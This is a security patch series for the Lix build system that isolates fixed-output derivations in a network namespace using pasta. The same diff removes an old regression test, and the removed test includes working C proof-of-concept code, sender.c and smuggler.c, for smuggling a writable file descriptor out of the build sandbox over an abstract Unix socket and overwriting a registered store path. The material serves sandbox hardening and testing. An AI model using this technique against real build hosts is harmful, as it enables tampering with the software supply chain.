100644 +--- a/lix/libutil/processes.hh ++++ b/lix/libutil/processes.hh +@@ -91,6 +91,9 @@ struct RunOptions + bool captureStdout = false; + bool isInteractive = false; + std::vector redirections; ++#if __linux__ ++ std::set caps; ++#endif + }; + + struct [[nodiscard("you must call RunningProgram::wait()")]] RunningProgram +-- +2.49.0 + + +From 6a61eea281de2c4d7d2b4f375511db0dacfec5ec Mon Sep 17 00:00:00 2001 +From: eldritch horrors +Date: Fri, 28 Mar 2025 23:04:56 +0100 +Subject: [SECURITY FIX 10/12] libstore: use pasta for FODs if available + +This allows using a userspace program, pasta, to handle comms between +the build sandbox, and the outside world; allowing for full isolation +including the network namespace, closing the "fixed-output derivation +talks to the host over an abstract domain socket" hole for good. + +Co-Authored-By: Puck Meerburg +Change-Id: Ifd499b7dbb3784600a6e842fede65fc031ff9f15 +--- + doc/manual/rl-next/pasta.md | 20 +++ + lix/libstore/build/local-derivation-goal.cc | 40 +++++- + lix/libstore/build/local-derivation-goal.hh | 15 +++ + lix/libstore/globals.cc | 3 + + lix/libstore/meson.build | 7 ++ + lix/libstore/platform/linux.cc | 133 +++++++++++++++++++- + lix/libstore/platform/linux.hh | 18 +++ + lix/libstore/settings/pasta-path.md | 10 ++ + meson.build | 7 ++ + meson.options | 4 + + misc/passt.nix | 64 ++++++++++ + package.nix | 6 + + tests/nixos/ca-fd-leak/default.nix | 90 ------------- + tests/nixos/ca-fd-leak/sender.c | 65 ---------- + tests/nixos/ca-fd-leak/smuggler.c | 66 ---------- + tests/nixos/default.nix | 2 - + tests/nixos/fetchurl.nix | 2 +- + 17 files changed, 323 insertions(+), 229 deletions(-) + create mode 100644 doc/manual/rl-next/pasta.md + create mode 100644 lix/libstore/settings/pasta-path.md + create mode 100644 misc/passt.nix + delete mode 100644 tests/nixos/ca-fd-leak/default.nix + delete mode 100644 tests/nixos/ca-fd-leak/sender.c + delete mode 100644 tests/nixos/ca-fd-leak/smuggler.c + +diff --git a/doc/manual/rl-next/pasta.md b/doc/manual/rl-next/pasta.md +new file mode 100644 +index 000000000..a7b7aa952 +--- /dev/null ++++ b/doc/manual/rl-next/pasta.md +@@ -0,0 +1,20 @@ ++--- ++synopsis: "Fixed output derivations can be run using `pasta` network isolation" ++cls: [] ++issues: [fj#285] ++category: "Breaking Changes" ++credits: [horrors, puck] ++--- ++ ++Fixed output derivations traditionally run in the host network namespace. ++On Linux this allows such derivations to communicate with other sandboxes ++or the host using the abstract Unix domains socket namespace; this hasn't ++been unproblematic in the past and has been used in two distinct exploits ++to break out of the sandbox. For this reason fixed output derivations can ++now run in a network namespace (provided by [`pasta`]), restricted to TCP ++and UDP communication with the rest of the world. When enabled this could ++be a breaking change and we classify it as such, even though we don't yet ++enable or require such isolation by default. We may enforce this in later ++releases of Lix once we have sufficient confidence that breakage is rare. ++ ++[`pasta`]: https://passt.top/ +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index c33bd8283..7ccb0ad33 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -13,6 +13,8 @@ + #include "lix/libutil/archive.hh" + #include "lix/libstore/daemon.hh" + #include "lix/libutil/regex.hh" ++#include "lix/libutil/file-descriptor.hh" ++#include "lix/libutil/file-system.hh" + #include "lix/libutil/result.hh" + #include "lix/libutil/topo-sort.hh" + #include "lix/libutil/json.hh" +@@ -24,6 +26,7 @@ + #include "lix/libutil/mount.hh" + #include "lix/libutil/strings.hh" + #include "lix/libutil/thread-name.hh" ++#include "platform/linux.hh" + + #include + #include +@@ -1073,7 +1076,7 @@ void LocalDerivationGoal::runChild() + /* N.B. it is realistic that these paths might not exist. It + happens when testing Nix building fixed-output derivations + within a pure derivation. */ +- for (auto & path : { "/etc/resolv.conf", "/etc/services", "/etc/hosts" }) ++ for (auto & path : { "/etc/services", "/etc/hosts" }) + if (pathExists(path)) { + // Copy the actual file, not the symlink, because we don't know where + // the symlink is pointing, and we don't want to chase down the entire +@@ -1094,6 +1097,11 @@ void LocalDerivationGoal::runChild() + copyFile(path, chrootRootDir + path, { .followSymlinks = true }); + } + ++ if (pathExists("/etc/resolv.conf")) { ++ const auto resolvConf = rewriteResolvConf(readFile("/etc/resolv.conf")); ++ writeFile(chrootRootDir + "/etc/resolv.conf", resolvConf); ++ } ++ + if (settings.caFile != "" && pathExists(settings.caFile)) { + // For the same reasons as above, copy the CA certificates file too. + // It should be even less likely to change during the build than resolv.conf. +@@ -1221,6 +1229,36 @@ void LocalDerivationGoal::runChild() + if (setuid(sandboxUid()) == -1) + throw SysError("setuid failed"); + ++ if (runPasta) { ++ // wait for the pasta interface to appear. pasta can't signal us when ++ // it's done setting up the namespace, so we have to wait for a while ++ AutoCloseFD fd(socket(PF_INET, SOCK_DGRAM, IPPROTO_IP)); ++ if (!fd) throw SysError("cannot open IP socket"); ++ ++ struct ifreq ifr; ++ strcpy(ifr.ifr_name, LinuxLocalDerivationGoal::PASTA_NS_IFNAME); ++ // wait two minutes for the interface to appear. if it does not do so ++ // we are either grossly overloaded, or pasta startup failed somehow. ++ static constexpr int SINGLE_WAIT_US = 1000; ++ static constexpr int TOTAL_WAIT_US = 120'000'000; ++ for (unsigned tries = 0; ; tries++) { ++ if (tries > TOTAL_WAIT_US / SINGLE_WAIT_US) { ++ throw Error( ++ "sandbox network setup timed out, please check daemon logs for " ++ "possible error output." ++ ); ++ } else if (ioctl(fd.get(), SIOCGIFFLAGS, &ifr) == 0) { ++ if ((ifr.ifr_ifru.ifru_flags & IFF_UP) != 0) { ++ break; ++ } ++ } else if (errno == ENODEV) { ++ usleep(SINGLE_WAIT_US); ++ } else { ++ throw SysError("cannot get loopback interface flags"); ++ } ++ } ++ } ++ + setUser = false; + } + #endif +diff --git a/lix/libstore/build/local-derivation-goal.hh b/lix/libstore/build/local-derivation-goal.hh +index eb2fe50f3..a0031e141 100644 +--- a/lix/libstore/build/local-derivation-goal.hh ++++ b/lix/libstore/build/local-derivation-goal.hh +@@ -285,6 +285,12 @@ struct LocalDerivationGoal : public DerivationGoal + protected: + using DerivationGoal::DerivationGoal; + ++ /** ++ * Whether to run pasta for network-endowed derivations. Running pasta ++ * currently requires actively waiting for its net-ns setup to finish. ++ */ ++ bool runPasta = false; ++ + /** + * Setup dependencies outside the sandbox. + * Called in the parent nix process. +@@ -294,6 +300,15 @@ protected: + throw Error("sandboxing builds is not supported on this platform"); + }; + ++ /** ++ * Rewrite resolv.conf for use in the sandbox. Used in the linux platform ++ * to replace nameservers * when using pasta for fixed output derivations. ++ */ ++ virtual std::string rewriteResolvConf(std::string fromHost) ++ { ++ return fromHost; ++ } ++ + /** + * Create a new process that runs `openSlave` and `runChild` + * On some platforms this process is created with sandboxing flags. +diff --git a/lix/libstore/globals.cc b/lix/libstore/globals.cc +index b4328b068..7fc4c6a21 100644 +--- a/lix/libstore/globals.cc ++++ b/lix/libstore/globals.cc +@@ -87,6 +87,9 @@ Settings::Settings() + #if defined(__linux__) && defined(SANDBOX_SHELL) + sandboxPaths.setDefault(tokenizeString("/bin/sh=" SANDBOX_SHELL)); + #endif ++#if defined(__linux__) && defined(PASTA_PATH) ++ pastaPath.setDefault(PASTA_PATH); ++#endif + + /* chroot-like behavior from Apple's sandbox */ + #if __APPLE__ +diff --git a/lix/libstore/meson.build b/lix/libstore/meson.build +index e59ae01b5..628ec1e55 100644 +--- a/lix/libstore/meson.build ++++ b/lix/libstore/meson.build +@@ -82,6 +82,7 @@ libstore_setting_definitions = files( + 'settings/narinfo-cache-negative-ttl.md', + 'settings/narinfo-cache-positive-ttl.md', + 'settings/netrc-file.md', ++ 'settings/pasta-path.md', + 'settings/plugin-files.md', + 'settings/post-build-hook.md', + 'settings/pre-build-hook.md', +@@ -326,6 +327,12 @@ elif busybox.found() + } + endif + ++if pasta.found() ++ cpp_str_defines += { ++ 'PASTA_PATH': pasta.full_path(), ++ } ++endif ++ + cpp_args = [] + + foreach name, value : cpp_str_defines +diff --git a/lix/libstore/platform/linux.cc b/lix/libstore/platform/linux.cc +index f8b721475..722135081 100644 +--- a/lix/libstore/platform/linux.cc ++++ b/lix/libstore/platform/linux.cc +@@ -1,16 +1,25 @@ + #include "lix/libstore/build/worker.hh" + #include "lix/libutil/cgroup.hh" ++#include "lix/libutil/file-descriptor.hh" ++#include "lix/libutil/file-system.hh" + #include "lix/libutil/finally.hh" + #include "lix/libstore/gc-store.hh" ++#include "lix/libutil/processes.hh" + #include "lix/libutil/signals.hh" + #include "lix/libstore/platform/linux.hh" + #include "lix/libutil/regex.hh" + #include "lix/libutil/strings.hh" + ++#include ++#include + #include + #include + #include + ++#if __linux__ ++#include ++#endif ++ + #if HAVE_SECCOMP + #include + #include +@@ -61,6 +70,14 @@ static void readFileRoots(const char * path, UncheckedRoots & roots) + } + } + ++LinuxLocalDerivationGoal::~LinuxLocalDerivationGoal() ++{ ++ // pasta being left around mostly happens when builds are aborted ++ if (pastaPid) { ++ pastaPid.kill(); ++ } ++} ++ + void LinuxLocalStore::findPlatformRoots(UncheckedRoots & unchecked) + { + auto procDir = AutoCloseDir{opendir("/proc")}; +@@ -859,6 +876,26 @@ void LinuxLocalDerivationGoal::prepareSandbox() + } + } + ++std::string LinuxLocalDerivationGoal::rewriteResolvConf(std::string fromHost) ++{ ++ if (!runPasta) { ++ return fromHost; ++ } ++ ++ static constexpr auto flags = std::regex::ECMAScript | std::regex::multiline; ++ static auto lineRegex = regex::parse("^nameserver\\s.*$", flags); ++ static auto v4Regex = regex::parse("^nameserver\\s+\\d{1,3}\\.", flags); ++ static auto v6Regex = regex::parse("^nameserver.*:", flags); ++ std::string nsInSandbox = "\n"; ++ if (std::regex_search(fromHost, v4Regex)) { ++ nsInSandbox += fmt("nameserver %s\n", PASTA_HOST_IPV4); ++ } ++ if (std::regex_search(fromHost, v6Regex)) { ++ nsInSandbox += fmt("nameserver %s\n", PASTA_HOST_IPV6); ++ } ++ return std::regex_replace(fromHost, lineRegex, "") + nsInSandbox; ++} ++ + Pid LinuxLocalDerivationGoal::startChild(std::function openSlave) + { + #if HAVE_SECCOMP +@@ -886,9 +923,11 @@ Pid LinuxLocalDerivationGoal::startChild(std::function openSlave) + + - The private network namespace ensures that the builder + cannot talk to the outside world (or vice versa). It +- only has a private loopback interface. (Fixed-output +- derivations are not run in a private network namespace +- to allow functions like fetchurl to work.) ++ only has a private loopback interface. If a copy of ++ `pasta` is available, Fixed-output derivations are run ++ inside a private network namespace with internet ++ access, otherwise they are run in the host's network ++ namespace, to allow functions like fetchurl to work. + + - The IPC namespace prevents the builder from communicating + with outside processes using SysV IPC mechanisms (shared +@@ -909,6 +948,10 @@ Pid LinuxLocalDerivationGoal::startChild(std::function openSlave) + if (derivationType->isSandboxed()) + privateNetwork = true; + ++ // don't launch pasta unless we have a tun device. in a build sandbox we ++ // commonly do not, and trying to run pasta anyway naturally won't work. ++ runPasta = !privateNetwork && settings.pastaPath != "" && pathExists("/dev/net/tun"); ++ + userNamespaceSync.create(); + + Pipe sendPid; +@@ -933,7 +976,9 @@ Pid LinuxLocalDerivationGoal::startChild(std::function openSlave) + + ProcessOptions options; + options.cloneFlags = CLONE_NEWPID | CLONE_NEWNS | CLONE_NEWIPC | CLONE_NEWUTS | CLONE_PARENT | SIGCHLD; +- if (privateNetwork) ++ // we always want to create a new network namespace for pasta, even when ++ // we can't actually run it. not doing so hides bugs and impairs purity. ++ if (settings.pastaPath != "" || privateNetwork) + options.cloneFlags |= CLONE_NEWNET; + if (usingUserNamespace) + options.cloneFlags |= CLONE_NEWUSER; +@@ -1004,6 +1049,67 @@ Pid LinuxLocalDerivationGoal::startChild(std::function openSlave) + /* Signal the builder that we've updated its user namespace. */ + writeFull(userNamespaceSync.writeSide.get(), "1"); + ++ if (runPasta) { ++ // Bring up pasta, for handling FOD networking. We don't let it daemonize ++ // itself for process managements reasons and kill it manually when done. ++ ++ // TODO add a new sandbox mode flag to disable all or parts of this? ++ Strings args = { ++ // clang-format off ++ "--quiet", ++ "--foreground", ++ "--config-net", ++ "--gateway", PASTA_HOST_IPV4, ++ "--address", PASTA_CHILD_IPV4, "--netmask", PASTA_IPV4_NETMASK, ++ "--dns-forward", PASTA_HOST_IPV4, ++ "--gateway", PASTA_HOST_IPV6, ++ "--address", PASTA_CHILD_IPV6, ++ "--dns-forward", PASTA_HOST_IPV6, ++ "--ns-ifname", PASTA_NS_IFNAME, ++ "--no-netns-quit", ++ "--netns", "/proc/self/fd/0", ++ // clang-format on ++ }; ++ ++ AutoCloseFD netns(open(fmt("/proc/%i/ns/net", pid.get()).c_str(), O_RDONLY | O_CLOEXEC)); ++ if (!netns) { ++ throw SysError("failed to open netns"); ++ } ++ ++ AutoCloseFD userns; ++ if (usingUserNamespace) { ++ userns = ++ AutoCloseFD(open(fmt("/proc/%i/ns/user", pid.get()).c_str(), O_RDONLY | O_CLOEXEC)); ++ if (!userns) { ++ throw SysError("failed to open userns"); ++ } ++ args.push_back("--userns"); ++ args.push_back("/proc/self/fd/1"); ++ } ++ ++ // FIXME ideally we want a notification when pasta exits, but we cannot do ++ // this at present. without such support we need to busy-wait for pasta to ++ // set up the namespace completely and time out after a while for the case ++ // of pasta launch failures. pasta logs go to syslog only for now as well. ++ pastaPid = runProgram2({ ++ .program = settings.pastaPath, ++ .args = args, ++ .uid = useBuildUsers() ? std::optional(buildUser->getUID()) : std::nullopt, ++ .gid = useBuildUsers() ? std::optional(buildUser->getGID()) : std::nullopt, ++ // TODO these redirections are crimes. pasta closes all non-stdio file ++ // descriptors very early and lacks fd arguments for the namespaces we ++ // want it to join. we cannot have pasta join the namespaces via pids; ++ // doing so requires capabilities which pasta *also* drops very early. ++ .redirections = { ++ {.from = 0, .to = netns.get()}, ++ {.from = 1, .to = userns ? userns.get() : 1}, ++ }, ++ .caps = getuid() == 0 ++ ? std::set{CAP_SYS_ADMIN, CAP_NET_BIND_SERVICE} ++ : std::set{}, ++ }); ++ } ++ + return pid; + } + +@@ -1050,5 +1156,24 @@ void LinuxLocalDerivationGoal::killSandbox(bool getStats) + This avoids processes unrelated to the build being killed, thus avoiding: https://git.lix.systems/lix-project/lix/issues/667 */ + LocalDerivationGoal::killSandbox(getStats); + } ++ ++ if (pastaPid) { ++ // FIXME we really want to send SIGTERM instead and wait for pasta to exit, ++ // but we do not have the infra for that right now. we send SIGKILL instead ++ // and treat exiting with that as a successful exit code until such a time. ++ // this is not likely to cause problems since pasta runs as the build user, ++ // but not inside the build sandbox. if it's killed it's either due to some ++ // external influence (in which case the sandboxed child will probably fail ++ // due to network errors, if it used the network at all) or some bug in lix ++ if (auto status = pastaPid.kill(); !WIFSIGNALED(status) || WTERMSIG(status) != SIGKILL) { ++ if (WIFSIGNALED(status)) { ++ throw Error("pasta killed by signal %i", WTERMSIG(status)); ++ } else if (WIFEXITED(status)) { ++ throw Error("pasta exited with code %i", WEXITSTATUS(status)); ++ } else { ++ throw Error("pasta exited with status %i", status); ++ } ++ } ++ } + } + } +diff --git a/lix/libstore/platform/linux.hh b/lix/libstore/platform/linux.hh +index 9dba7f1de..47e33f240 100644 +--- a/lix/libstore/platform/linux.hh ++++ b/lix/libstore/platform/linux.hh +@@ -4,6 +4,7 @@ + #include "lix/libstore/build/local-derivation-goal.hh" + #include "lix/libstore/gc-store.hh" + #include "lix/libstore/local-store.hh" ++#include "lix/libutil/processes.hh" + + namespace nix { + +@@ -33,6 +34,20 @@ class LinuxLocalDerivationGoal : public LocalDerivationGoal + public: + using LocalDerivationGoal::LocalDerivationGoal; + ++ ~LinuxLocalDerivationGoal(); ++ ++ // NOTE these are all C strings because macos doesn't have constexpr std::string ++ // constructors, and std::string_view is a pain to turn into std::strings again. ++ static constexpr const char * PASTA_NS_IFNAME = "eth0"; ++ static constexpr const char * PASTA_HOST_IPV4 = "169.254.1.1"; ++ static constexpr const char * PASTA_CHILD_IPV4 = "169.254.1.2"; ++ static constexpr const char * PASTA_IPV4_NETMASK = "16"; ++ // randomly chosen 6to4 prefix, mapping the same ipv4ll as above. ++ // even if this id is used on the daemon host there should not be ++ // any collisions since ipv4ll should never be addressed by ipv6. ++ static constexpr const char * PASTA_HOST_IPV6 = "64:ff9b:1:4b8e:472e:a5c8:a9fe:0101"; ++ static constexpr const char * PASTA_CHILD_IPV6 = "64:ff9b:1:4b8e:472e:a5c8:a9fe:0102"; ++ + private: + /* + * Destroy the cgroup otherwise another build +@@ -41,6 +56,8 @@ private: + */ + void cleanupHookFinally() override; + ++ RunningProgram pastaPid; ++ + /** + * Create and populate chroot + */ +@@ -68,6 +85,7 @@ private: + return true; + } + ++ std::string rewriteResolvConf(std::string fromHost) override; + }; + + } +diff --git a/lix/libstore/settings/pasta-path.md b/lix/libstore/settings/pasta-path.md +new file mode 100644 +index 000000000..1df3600df +--- /dev/null ++++ b/lix/libstore/settings/pasta-path.md +@@ -0,0 +1,10 @@ ++--- ++name: pasta-path ++internalName: pastaPath ++type: Path ++default: "" ++--- ++If set to an absolute path, enables fully sandboxing fixed-output ++derivations, by using `pasta` to pass network traffic between the ++private network namespace. This allows for greater levels of isolation ++of builds to the host. +diff --git a/meson.build b/meson.build +index 92b4c05ec..adcea1142 100644 +--- a/meson.build ++++ b/meson.build +@@ -452,6 +452,13 @@ configdata += { + 'HAVE_DTRACE': dtrace_feature.enabled().to_int(), + } + ++pasta_path = get_option('pasta-path') ++# we can't check the pasta version because passt misuses stdio (it calls _exit() ++# after printing the version, which will never print the version unless run from ++# a terminal). pasta isn't mandatory yet due to high fetcher breakage potential. ++# we *will* enable it in our own packaging, but distributions are not forced to. ++pasta = find_program(pasta_path, required : false, native : false) ++ + lsof = find_program('lsof', native : true) + + # This is how Nix does generated headers... +diff --git a/meson.options b/meson.options +index 8d5eed0bc..50caa32c4 100644 +--- a/meson.options ++++ b/meson.options +@@ -24,6 +24,10 @@ option('sandbox-shell', type : 'string', value : 'busybox', + description : 'path to a statically-linked shell to use as /bin/sh in sandboxes (usually busybox)', + ) + ++option('pasta-path', type : 'string', value : 'pasta', ++ description : 'path to the location of pasta (provided by passt)', ++) ++ + option('enable-tests', type : 'boolean', value : true, + description : 'whether to enable tests or not (requires rapidcheck and gtest)', + ) +diff --git a/misc/passt.nix b/misc/passt.nix +new file mode 100644 +index 000000000..3c0c633fa +--- /dev/null ++++ b/misc/passt.nix +@@ -0,0 +1,64 @@ ++{ ++ lib, ++ stdenv, ++ buildPackages, ++ fetchurl, ++ getconf, ++ gitUpdater, ++ testers, ++}: ++ ++stdenv.mkDerivation (finalAttrs: { ++ pname = "passt"; ++ version = "2025_02_17.a1e48a0"; ++ ++ src = fetchurl { ++ url = "https://passt.top/passt/snapshot/passt-${finalAttrs.version}.tar.gz"; ++ hash = "sha256-/FUXxeYv3Lb0DiXmbS2PUzfLL5ZwHJ42tiuH7YnlljE="; ++ }; ++ ++ postPatch = '' ++ substituteInPlace Makefile --replace-fail \ ++ 'PAGE_SIZE=$(shell getconf PAGE_SIZE)' \ ++ "PAGE_SIZE=$(${stdenv.hostPlatform.emulator buildPackages} ${lib.getExe getconf} PAGE_SIZE)" ++ ''; ++ ++ makeFlags = [ ++ "prefix=${placeholder "out"}" ++ "VERSION=${finalAttrs.version}" ++ ]; ++ ++ passthru = { ++ tests.version = testers.testVersion { ++ package = finalAttrs.finalPackage; ++ }; ++ ++ updateScript = gitUpdater { ++ url = "https://passt.top/passt"; ++ }; ++ }; ++ ++ meta = with lib; { ++ homepage = "https://passt.top/passt/about/"; ++ description = "Plug A Simple Socket Transport"; ++ longDescription = '' ++ passt implements a translation layer between a Layer-2 network interface ++ and native Layer-4 sockets (TCP, UDP, ICMP/ICMPv6 echo) on a host. ++ It doesn't require any capabilities or privileges, and it can be used as ++ a simple replacement for Slirp. ++ ++ pasta (same binary as passt, different command) offers equivalent ++ functionality, for network namespaces: traffic is forwarded using a tap ++ interface inside the namespace, without the need to create further ++ interfaces on the host, hence not requiring any capabilities or ++ privileges. ++ ''; ++ license = [ ++ licenses.bsd3 # and ++ licenses.gpl2Plus ++ ]; ++ platforms = platforms.linux; ++ maintainers = with maintainers; [ _8aed ]; ++ mainProgram = "passt"; ++ }; ++}) +diff --git a/package.nix b/package.nix +index 3a2e08c8c..f1fd1b1f9 100644 +--- a/package.nix ++++ b/package.nix +@@ -45,6 +45,8 @@ + ninja, + ncurses, + openssl, ++ # FIXME: we need passt 2024_12_11.09478d5 or newer, i.e. nixos 25.05 or later ++ passt-lix ? __forDefaults.passt-lix, + pegtl, + pkg-config, + python3, +@@ -116,6 +118,8 @@ + # needs derivation patching to add debuginfo and coroutine library support + # !! must build this with clang as it is affected by the gcc coroutine bugs + capnproto-lix = callPackage ./misc/capnproto.nix { inherit stdenv; }; ++ ++ passt-lix = callPackage ./misc/passt.nix { }; + }, + }: + +@@ -249,6 +253,7 @@ stdenv.mkDerivation (finalAttrs: { + # which don't actually get added to PATH. And buildInputs is correct over + # nativeBuildInputs since this should be a busybox executable on the host. + "-Dsandbox-shell=${lib.getExe' busybox-sandbox-shell "busybox"}" ++ "-Dpasta-path=${lib.getExe' passt-lix "pasta"}" + ] + ++ lib.optional hostPlatform.isStatic "-Denable-embedded-sandbox-shell=true" + ++ lib.optional (finalAttrs.dontBuild && !lintInsteadOfBuild) "-Denable-build=false" +@@ -334,6 +339,7 @@ stdenv.mkDerivation (finalAttrs: { + ++ lib.optionals hostPlatform.isLinux [ + libseccomp + busybox-sandbox-shell ++ passt-lix + ] + ++ lib.optionals ( + stdenv.hostPlatform.isDarwin && lib.versionOlder stdenv.hostPlatform.darwinSdkVersion "11.0" +diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix +deleted file mode 100644 +index a6ae72adc..000000000 +--- a/tests/nixos/ca-fd-leak/default.nix ++++ /dev/null +@@ -1,90 +0,0 @@ +-# Nix is a sandboxed build system. But Not everything can be handled inside its +-# sandbox: Network access is normally blocked off, but to download sources, a +-# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". +-# The detail here is not important, but in our case it means that the hash of +-# the output has to be known beforehand. And if you know that, you get a few +-# rights: you no longer run inside a special network namespace! +-# +-# Now, Linux has a special feature, that not many other unices do: Abstract +-# unix domain sockets! Not only that, but those are namespaced using the +-# network namespace! That means that we have a way to create sockets that are +-# available in every single fixed-output derivation, and also all processes +-# running on the host machine! Now, this wouldn't be that much of an issue, as, +-# well, the whole idea is that the output is pure, and all processes in the +-# sandbox are killed before finalizing the output. What if we didn't need those +-# processes at all? Unix domain sockets have a semi-known trick: you can pass +-# file descriptors around! +-# This makes it possible to exfiltrate a file-descriptor with write access to +-# $out outside of the sandbox. And that file-descriptor can be used to modify +-# the contents of the store path after it has been registered. +- +-{ config, ... }: +- +-let +- pkgs = config.nodes.machine.nixpkgs.pkgs; +- +- # Simple C program that sends a a file descriptor to `$out` to a Unix +- # domain socket. +- # Compiled statically so that we can easily send it to the VM and use it +- # inside the build sandbox. +- sender = pkgs.runCommandWith { +- name = "sender"; +- stdenv = pkgs.pkgsStatic.stdenv; +- } '' +- $CC -static -o $out ${./sender.c} +- ''; +- +- # Okay, so we have a file descriptor shipped out of the FOD now. But the +- # Nix store is read-only, right? .. Well, yeah. But this file descriptor +- # lives in a mount namespace where it is not! So even when this file exists +- # in the actual Nix store, we're capable of just modifying its contents... +- smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); +- +- # The abstract socket path used to exfiltrate the file descriptor +- socketName = "FODSandboxExfiltrationSocket"; +-in +-{ +- name = "ca-fd-leak"; +- +- nodes.machine = +- { config, lib, pkgs, ... }: +- { virtualisation.writableStore = true; +- nix.settings.substituters = lib.mkForce [ ]; +- virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; +- }; +- +- testScript = { nodes }: '' +- start_all() +- +- machine.succeed("echo hello") +- # Start the smuggler server +- machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") +- +- # Build the smuggled derivation. +- # This will connect to the smuggler server and send it the file descriptor +- machine.succeed(r""" +- nix-build -E ' +- builtins.derivation { +- name = "smuggled"; +- system = builtins.currentSystem; +- # look ma, no tricks! +- outputHashMode = "flat"; +- outputHashAlgo = "sha256"; +- outputHash = builtins.hashString "sha256" "hello, world\n"; +- builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; +- args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; +- }' +- """.strip()) +- +- +- # Tell the smuggler server that we're done +- machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") +- +- # Check that the file was not modified +- machine.succeed(r""" +- cat ./result +- test "$(cat ./result)" = "hello, world" +- """.strip()) +- ''; +- +-} +diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c +deleted file mode 100644 +index 75e54fc8f..000000000 +--- a/tests/nixos/ca-fd-leak/sender.c ++++ /dev/null +@@ -1,65 +0,0 @@ +-#include +-#include +-#include +-#include +-#include +-#include +-#include +-#include +-#include +-#include +- +-int main(int argc, char **argv) { +- +- assert(argc == 2); +- +- int sock = socket(AF_UNIX, SOCK_STREAM, 0); +- +- // Set up a abstract domain socket path to connect to. +- struct sockaddr_un data; +- data.sun_family = AF_UNIX; +- data.sun_path[0] = 0; +- strcpy(data.sun_path + 1, argv[1]); +- +- // Now try to connect, To ensure we work no matter what order we are +- // executed in, just busyloop here. +- int res = -1; +- while (res < 0) { +- res = connect(sock, (const struct sockaddr *)&data, +- offsetof(struct sockaddr_un, sun_path) +- + strlen(argv[1]) +- + 1); +- if (res < 0 && errno != ECONNREFUSED) perror("connect"); +- if (errno != ECONNREFUSED) break; +- } +- +- // Write our message header. +- struct msghdr msg = {0}; +- msg.msg_control = malloc(128); +- msg.msg_controllen = 128; +- +- // Write an SCM_RIGHTS message containing the output path. +- struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); +- hdr->cmsg_len = CMSG_LEN(sizeof(int)); +- hdr->cmsg_level = SOL_SOCKET; +- hdr->cmsg_type = SCM_RIGHTS; +- int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); +- memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); +- +- msg.msg_controllen = CMSG_SPACE(sizeof(int)); +- +- // Write a single null byte too. +- msg.msg_iov = malloc(sizeof(struct iovec)); +- msg.msg_iov[0].iov_base = ""; +- msg.msg_iov[0].iov_len = 1; +- msg.msg_iovlen = 1; +- +- // Send it to the othher side of this connection. +- res = sendmsg(sock, &msg, 0); +- if (res < 0) perror("sendmsg"); +- int buf; +- +- // Wait for the server to close the socket, implying that it has +- // received the commmand. +- recv(sock, (void *)&buf, sizeof(int), 0); +-} +diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c +deleted file mode 100644 +index 82acf37e6..000000000 +--- a/tests/nixos/ca-fd-leak/smuggler.c ++++ /dev/null +@@ -1,66 +0,0 @@ +-#include +-#include +-#include +-#include +-#include +-#include +-#include +- +-int main(int argc, char **argv) { +- +- assert(argc == 2); +- +- int sock = socket(AF_UNIX, SOCK_STREAM, 0); +- +- // Bind to the socket. +- struct sockaddr_un data; +- data.sun_family = AF_UNIX; +- data.sun_path[0] = 0; +- strcpy(data.sun_path + 1, argv[1]); +- int res = bind(sock, (const struct sockaddr *)&data, +- offsetof(struct sockaddr_un, sun_path) +- + strlen(argv[1]) +- + 1); +- if (res < 0) perror("bind"); +- +- res = listen(sock, 1); +- if (res < 0) perror("listen"); +- +- int smuggling_fd = -1; +- +- // Accept the connection a first time to receive the file descriptor. +- fprintf(stderr, "%s\n", "Waiting for the first connection"); +- int a = accept(sock, 0, 0); +- if (a < 0) perror("accept"); +- +- struct msghdr msg = {0}; +- msg.msg_control = malloc(128); +- msg.msg_controllen = 128; +- +- // Receive the file descriptor as sent by the smuggler. +- recvmsg(a, &msg, 0); +- +- struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); +- while (hdr) { +- if (hdr->cmsg_level == SOL_SOCKET +- && hdr->cmsg_type == SCM_RIGHTS) { +- +- // Grab the copy of the file descriptor. +- memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); +- } +- +- hdr = CMSG_NXTHDR(&msg, hdr); +- } +- fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection"); +- close(a); +- +- // Wait for a second connection, which will tell us that the build is +- // done +- a = accept(sock, 0, 0); +- fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); +- // Write a new content to the file +- if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); +- char * new_content = "Pwned\n"; +- int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); +- if (written_bytes != strlen(new_content)) perror("write"); +-} +diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix +index 474b4ad64..2ad0923e1 100644 +--- a/tests/nixos/default.nix ++++ b/tests/nixos/default.nix +@@ -160,8 +160,6 @@ in + ["i686-linux" "x86_64-linux"] + (system: runNixOSTestFor system ./setuid/setuid.nix); + +- ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak; +- + fetch-git = runNixOSTestFor "x86_64-linux" ./fetch-git; + + symlinkResolvconf = runNixOSTestFor "x86_64-linux" ./symlink-resolvconf.nix; +diff --git a/tests/nixos/fetchurl.nix b/tests/nixos/fetchurl.nix +index 719405be5..1626e1c03 100644 +--- a/tests/nixos/fetchurl.nix ++++ b/tests/nixos/fetchurl.nix +@@ -52,7 +52,7 @@ in + + security.pki.certificateFiles = [ "${goodCert}/cert.pem" ]; + +- networking.hosts."127.0.0.1" = [ "good" "bad" ]; ++ 